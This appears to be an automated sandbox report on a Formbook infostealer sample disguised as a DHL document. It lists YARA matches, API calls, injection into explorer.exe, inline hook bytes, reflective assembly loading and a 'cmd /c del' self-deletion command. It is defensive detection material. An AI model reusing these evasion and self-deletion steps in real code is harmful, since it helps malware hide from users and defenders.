          Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_003B2050
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFE778
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFE777
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFBDC4
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_059A2440
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_059A3328
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_059A6BB0
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_059A6BA0
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041E070
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041E225
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041EB4E
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041EB51
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041E583
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041D5A3
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00409E60
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041DED3
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00492050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A00D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A26E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8E225
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8EB51
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8EB4E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8E070
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8DED3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D79E60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D72FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D72D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D72D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8E583
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8D5A3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04A0B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A35A NtCreateFile,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041A48A NtReadFile,NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A49770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A4A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A490 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A410 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8A48A NtReadFile,NtClose,
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000000.00000002.247896269.000000000045C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000000.00000002.252007912.00000000059B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000000.00000003.240961826.0000000003846000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000001.00000000.246111705.000000000053C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000001.00000002.316614192.00000000011FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exe, 00000001.00000002.320523635.000000000372E000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exeBinary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
          Source: DHL DOC 3406506482.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: DHL DOC 3406506482.exeVirustotal: Detection: 29%
          Source: DHL DOC 3406506482.exeReversingLabs: Detection: 37%
          Source: DHL DOC 3406506482.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL DOC 3406506482.exe "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL DOC 3406506482.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/2
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1688:120:WilError_01
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: DHL DOC 3406506482.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL DOC 3406506482.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
          Source: Binary string: explorer.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: DHL DOC 3406506482.exe, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.DHL DOC 3406506482.exe.3b0000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.DHL DOC 3406506482.exe.3b0000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.3.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.9.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.5.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.2.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.DHL DOC 3406506482.exe.490000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.7.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL DOC 3406506482.exe.490000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DF41E1 push ebp; retn 0004h
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DF4219 push esi; retn 0004h
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFE5DB push es; retf
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFE683 push es; retf
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFE768 pushfd ; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFB109 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 0_2_00DFDC38 push cs; retf
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00416913 pushad ; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00409BA8 push ebp; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00409BA8 push ebp; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0041664D push di; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D79BA8 push ebp; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D86913 pushad ; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8664D push di; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8D56C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8D50B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_02D8D502 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85043153763

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE6
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
